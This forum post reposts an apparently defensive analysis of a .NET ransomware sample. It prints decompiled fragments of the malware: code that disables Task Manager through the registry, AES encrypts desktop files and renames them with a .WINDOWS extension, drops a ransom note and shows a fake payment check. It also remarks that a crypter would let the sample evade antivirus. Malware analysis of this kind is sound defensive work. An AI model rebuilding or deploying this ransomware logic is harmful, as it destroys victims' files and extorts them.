Jump to content

Recommended Posts

  • Active Members
  • Online Malware Analysis Report:
https://www.reverse.it/sample/86e0eac8c5ce70c4b839ef18af5231b5f92e292b81e440193cdbdc7ed108049f?environmentId=100
  • Analysis mode:
Static and Dynamic Analysis
  • Host Operating System:
Windows 7 64 bit
  • Guest Operating System:
Windows 7 32 bit
  • Containment:
Vmware v12
  • Firewall/Security Installed:
Windows Defender
  • (Static Analysis) Analysis Tools Used:
IDA, .NET Reflector
  • (Static Analysis) Analysis screenshots:
Yes
  • (Dynamic Analysis) Analysis Tools Used:
Process Monitor, Process Explorer
  • (Dynamic Analysis) Analysis screenshots:
Yes

 

Introduction

Ransomware is a type of malware which usually acts as a trojan horse, the user mistakes it for a legitimate file and when he activates the “program, it begins encrypting files on the computer. when the task is completed it demands a ransom, usually in bitcoins.

in most cases you have two options:
 

  1. pay the ransom
     
  2. lose your files for ever


surprisingly a lot of people choose to pay the ransom to get their files back, as seen with CryptoLocker back in 2013.
Today we will be reviewing a sample I randomly picked up at Here, a pretty good malware collection.
My Sample

 

Static review

Opening the file in IDA reveals that this malware is written in .NET
IDA is unable to make this file readable, expose is imports or exports but before moving on to a .NET decompiler I decide to explore the Strings and Names view.

String view seems empty:

2ut00go.jpg

Names:

9srslz.jpg

 

The strings raise my suspicious since the program does not seem to hide its intentions.

20z36fa.jpg

 

This was enough. I headed to the decompiler, I am using the .NET Reflector for this one how ever it is not free, you should use dotPeek.

The program contains the following structure:

2rwkkrr.jpg

 

Form 1:

Fields and Methods:

//Fields
private Button button;
private IContainer components = null;
private string computerName = Environment.MachineName.ToString();
private Label label1;
private Label label2;
private PictureBox pictureBox1;
private string userDir = @"C:\Users\";
private string userName = Environment.UserName;

 

 

//Methods
public Form1();
public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes);
private void button1_Click(object sender, EvenArgs e);
public string CreatePassword(int lenghts);
protected override void Dispose(bool disposing);
public void encryptDirectory(string location, string password);
public void EncryptFile(string file, string password);
private void Form_Shown(object sender, EventArgs e);
private void Form1_Load(object sender, EventArgs e);
private void InitializeComponent();
public void messageCreator();
public void SendPassword(string password);
public void startAction();

 

Form1 constructor:

I would be curios why he chose to create the constructor like this:

//public Form1()
{
 this.InitializeComponent();
 RegistryKet key2 = Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\
 if (key2.GetValue("DisableTaskMgr") == null)
 {
     key2.Setvalue("DisableTaskMgr","1");
 }
 else
 {
     key2.DeleteValue("DisableTaskMgr");
 }
 RegistryKet key - Registry.CurrentUser.CreateSubKey(@"Control Panel\Desktop");
 key.SetValue("Wallpaper","0");
 key.Close();
 key2.Close();
}

full registry path - “Software\Microsoft\Windows\CurrentVersion\Policies\System"

This constructor disables the task manager and blacks out the wall paper.

 

AES_Encrypt:

 

This was the most interesting function, I will expand on it and explain how Symmetric encryption works.
This encryption works with one key, to encrypt a piece of plain text. both of the parties need to know the key.
The AES encryption is an iterative algorithm. which means we will need the following to construct it:

 

The key  - passwordBytes

 

CipherMode -

 

ECB (electronic code book) is basically raw cipher. For each block of input, you encrypt the block and get some output. The problem with this transform is that any resident properties of the plaintext might well show up in the ciphertext – possibly not as clearly – that's what blocks and key schedules are supposed to protect againt, but analyzing the patterns you may be able to deduce properties that you otherwise thought were hidden.

CBC mode is short for cipher block chaining. You have an initialization vector which you XOR the first block of plaintext against. You then encrypt that block of plaintext. The next block of plaintext is xor'd against the last encrypted block before you encrypt this block.

 

IV or Initialization Vector - since the AES is iterative, each encpytion block is dependant on the previous block but the first block does not have a previous block, to solve this problem the IV was born.

Block Size - The plain text will be split into blocks, each in block size. that means that if the block size is 64 bits and the text is 130 bit size then you'll get 3 blocks, two blocks with plain text in size of 64 bits and another block with 2 bits of plain text and another 28 bits of padded bits.

Key Size

You can read all about it here:

ECB OR CBC
What is a block chiper
Why use IV's

 

Regarding on how AES works, I wont get into it. lets see what happens in the code

30vyftg.jpg

 

First the function accepts two parameters, the bytes we will encrypt and the key.
It creates a salt.

We can see also that it creates a random generated key and a IV using the DeriveBytes class.
“Rfc2898DeriveBytes is an implementation of PBKDF2. What it does is repeatedly hash the user password along with the salt.” the third parameter is the number of iterations.

The GetBytes function returns the pseudo-random key for this object.

So the key and the IV are fully randomized based on the size of the key and the block size.

Finishing it up with setting the chiper to CBC mode since AES is CBC.

So as we can see, this is not just AES encryption, first we use one key to generate a key. from that key we generate two more keys(Key for AES and the IV), then and only then we encrypt bytesToBeEncrypted.

the function translates the stream to a byte buffer and returns it .

Keep in mind, this is not complex. With a proper crypter this lame ass .NET program can bypass most AV detection.
 

EncryptFile:

public void EncrypFile(string file, string password)
{
 byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
 byte[] bytes = Encoding.UTF8.GetBytes(password);
 bytes = SHA256.Create().Computerhash(bytes);
 byte[] buffer3 = this.AES_Encrypt(bytesToBeEncrypted, bytes);
 File.WriteAllBytes(file,buffer3);
 File.Move(file, file+"WINDOWS");
}

The function accepts a string file, probably the path. then it generates another another pass key, hashes it and encrypts it with the AES_Encrypt. it changes the file extension and overwrites it.

Message Creator:

public void messageCreator()
{
 string str = @"\Desktop\READ_IT.txt";
 string path = this.userDir + this.userName + str;
 string[] contents = new string[] {"Your files have been er
 File.WriteAllLines(path, contents);
}

The message creator drops a readme file onto the desktop upon function call

CreatePassword:

public string CreatorPassword(int length)
{
 StringBuilder builder - new StringBuilder();
 Random random = new Random();
 while (0 < length--)
 {
   builder.Append("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/"[random.Next("abcdefghijk
 }
 return builder.ToString();
}

Basically, a random password generator.

 

SendPassword:

public void SendPassword(string password)
{
 string[] textArray1 = new string[] {this.computerName, "-", this.userName, " ", password );
 string str - string.Concat(textArray1);
}

I am confused for what this function is doing seems like nothing, more on the dynamic analysis.

EncryptDirectory:

14xnwjo.jpg

 

Encrypts all the files in the directory, it gets all the extensions to the files in the directory and if the current file has one of the extensions the malware is looking for, it encrypts the file.

The main functionality:

public void startAction()
{ 
 string password - this.CreatePassword(15);
 string str2 = @"\Desktop\"
 string location = this.userDir + this.userName + str2;
 this.SendPassword(password);
 this.encryptDirectory(location, password);
 this.messageCreaor();
 password = null;
}

It seems the malware is only encrypting files on the desktop, since it is hard coded as a function parameter.

The rest of the forms don't have anything special, except from this :

private void button1_Click(object sender, EventArgs e)
{ 
 MessageBox.Show("Checking Payment.............Pleasse Wait", "Please wait");
 MessageBox.Show("Your Payment has failed, The funs have been sent back to your wallet. Please send it again", "Error");
}

Found on form3, this is very worrying. I also did not see any decryption methods that could be triggered.

Static Conclusion:

The malware generates a new password, or a key. then it uses that key to encrypt all the files on the directory which is the desktop in this malware’s case. when this task is completed it drops a readme file and pops up a window with payment options and warning options.

Dynamic Review:

Running Process explorer and Process monitor, I filtered unrelated process events out of the program.

The program indeed, dropped a read_it file and encrypted only the files located on the desktop and disabled the task manager.

Attempt to black out the wallpaper as seen in Process Monitor:

11:04:....     3520 RegSetValue    HKCU\Control Panel\Desktop\Wallpaper SUCCESS     Type: REG_SZ, Le...

 

Disable Task Manager:

xe3crl.jpg

Drop READ_IT file:

 

vdlac1.jpg

 

2cy41si.jpg

 

But it's easy to revert most of its effects.

The desktop has not been changed, and we simply need to remove the registry key that I showed above to restore the Task Manager operations.

The program has suspected made no contact with any server or IP if your files are encrypted with this program you cannot revert the files back, EVER.

When you click that you paid for the decryption the program prompts this message:

2cxcajs.jpg

 

Clicking “OK” will always result in the following message as seen in the code:

rua8gl.jpg

 

But the money will not be refunded as there are no other function triggers to this button click as seen in the code

The program adds the .WINDOWS extension to all files it encrypts on the desktop (It only encrypts files on the desktop), removing that extension back to the original one will show a messed up file.

2mnklc2.jpg

 

Conclusion:

This program is dangerous, but not the most dangerous. you can't run it unless you have the correct version of .NET installed on your computer.

It only encrypts files on the desktop and not to mention that it does not encrypt all file extensions.

It does disable the task manager and attempts to change the desktop background but you can revert those effects back.

The only thing that you won't get back is your files.

This example shows how easy it is to construct ransomware, how easy it is to steal money and even in 2017 (this sample was caught in june 2017) people still download and double click on files called “VapeHacksLoader” and run them.

Be careful out there

 

Source: https://malwaretips.com/threads/the-ucylocker-ransomware.78330/

 

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...